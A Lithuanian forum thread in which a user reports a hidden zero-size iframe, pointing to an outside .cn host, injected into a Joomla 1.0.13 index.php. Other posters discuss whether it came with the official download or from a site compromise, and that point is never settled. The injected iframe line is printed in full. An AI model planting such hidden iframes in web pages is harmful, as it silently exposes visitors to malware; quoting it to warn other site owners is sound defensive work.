Trojanas 1.0.13 versijoje

[niekshas]

Jau senokai turiu parsisiuntes 1.0.13 joomla versija ir puikiai ja iki siol naudojausi (siunciausi is cia). Ir stai snd baiginedamas viena projekta pamatau narsykleja, kad yra kraunamas dar kazkokstai url adresas. Pasiziurejas i page source pacioje apacioje isvydau toki varianta:

Code: Select all

<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Is pradziu pamaniau, kad tai koks meta tagas uzsleptas templeite, bet perziurejus visus failus rasti jo taip ir nepavyko... tuomet nutariau paieshkoti joomloi ir radau index.php faile.

Pagooglines ishsiaishkinau jog tai trojanas. Pasikartosiu jog joomla buvo siusta is sio (oficialaus) puslapio.
Taigi jei kas dar naudojates senute 1.0.13 versija apsiziurekit kas ten kaip.

[Stasys]

ar dar kas nors gali tai patvirtinti?

[t-spark]

trojana ikiso skriptas, ieskantis saugumo skyliu, lauzantis puslapius. trojano tikrai nera joomla failuose. matyt puslapis buvo blogai apsaugotas, nenaudojamas .htaccess failas arba index.php failo prieigos teises buvo auksciau nei 644.

[niekshas]

trojana ikiso skriptas, ieskantis saugumo skyliu, lauzantis puslapius. trojano tikrai nera joomla failuose. matyt puslapis buvo blogai apsaugotas, nenaudojamas .htaccess failas arba index.php failo prieigos teises buvo auksciau nei 644.

Sie variantai atkrenta: nes ir mano pc esantis joomlos paketas buvo jau su tuo kodu index.php faile.

[Stasys]

atsisiusk nauja ir bus matyt ar tavo kompiuteris apkrestas, ar ne

[niekshas]

Taip taip... žinau jau. Man teko formatuoti pc, kad susitvarkyti. Nes nei viena iš mano bandytų anti virusinių jo nepašalino. Nešiau ir pas specialistus - pinigus mokėjau, bet ir jie nieko nepadarė. Gal galėtum duoti nuorodą kur tu ten tuos atsakymus radai? Jei ateityje ši problema vėl pasikartotu.

[Stasys]

pazymek kaip solved